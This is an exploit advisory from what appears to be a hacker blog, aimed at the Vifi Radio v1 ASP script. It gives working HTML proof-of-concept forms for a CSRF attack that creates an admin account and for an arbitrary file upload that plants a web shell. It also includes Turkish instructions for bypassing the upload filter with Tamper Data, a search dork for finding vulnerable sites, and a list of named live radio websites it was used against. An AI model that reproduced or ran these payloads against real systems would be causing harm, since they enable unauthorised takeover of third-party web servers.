h4x0re Security, Vulnerability Researching, Exploits, h4, KnocKout: Vifi Radio v1 - Arbitrary File Upload / CSRF Vulnerability

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Vifi Radio
|~Affected Version : v1
|~Software : 
http://scriptim.org/market-item/vifi-v1-radyo-scripti/

http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html 
|~Official Demo :  http://radyo.vifibilisim.com
|~RISK : High
|~DORK : inurl:index.asp?radyo=2
|~Tested On : [L] Windows 7, Mozilla Firefox
########################################################
Tested on;
http://radyo.vifibilisim.com
www.radyoimza.com
www.bayraklifm.com
www.istanbulfm.net
www.gaziantepfurkanradyo.com
http://iskenderunfm.com
----------------------------------------------------------
BİLGİ : 
Scriptte daha önce keşfedilmiş olan CSRF Zaafiyeti Kullanarak 
Admin Şifresi değiştirilir ve panele giriş yapılır.
Aşağıda verilen PoC kodlar, "Tamper Data" Eşliğinde 
Upload süzgecini bypass etmek için kullanıldığında 
zararlı yazılım doğrudan sunucuya yüklenebilir.
Yüklenen Shell Dosyasının sunucudaki yerini
 "Tamper Data" zaten iletim esnasında yakalayacaktır.
Alternatif olarak "Anasayfa" üzerinde aşağıda yer alan 
"Djler" bölümünden shell dosyasının izi sürülebilir.

Example : http://radyo.vifibilisim.com/yonetim/djler/2082015121530.php

----------------------------------------------------------
            Upload.HTML
-----------------------------------------------------------

<td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data"  document.MM_returnValue">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td>
</tr> <tr>
<td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main">
<input name="fmsubmit" type="submit" class="main" value="Y&Uuml;KLE" /></td>
   
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>

----------------------------------------------------------
                      PoC
----------------------------------------------------------
<html>
  <body>
    <form action="http://[TARGET]/yonetim/kullanici-kaydet.asp?tur=g" method="POST">
      <input type="hidden" name="rutbe" value="1" />
      <input type="hidden" name="djadi" value="0" />
      <input type="hidden" name="resim" value="Vifi+Bili%FEim" />
      <input type="hidden" name="firma" value="USERNAME" />
      <input type="hidden" name="link" value="PASSWORD" />
      <input type="hidden" name="sira" value="23" />
      <input type="hidden" name="ilet" value="G%D6NDER" />
      <input type="hidden" name="Submit" value="Exploit!" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


############################
"Admin Panel: /yonetim "
############################

Referance:  https://www.exploit-db.com/exploits/37892/

Sayfalar

21 Ağustos 2015 Cuma

Vifi Radio v1 - Arbitrary File Upload / CSRF Vulnerability

Hiç yorum yok:

Yorum Gönder

Databases News.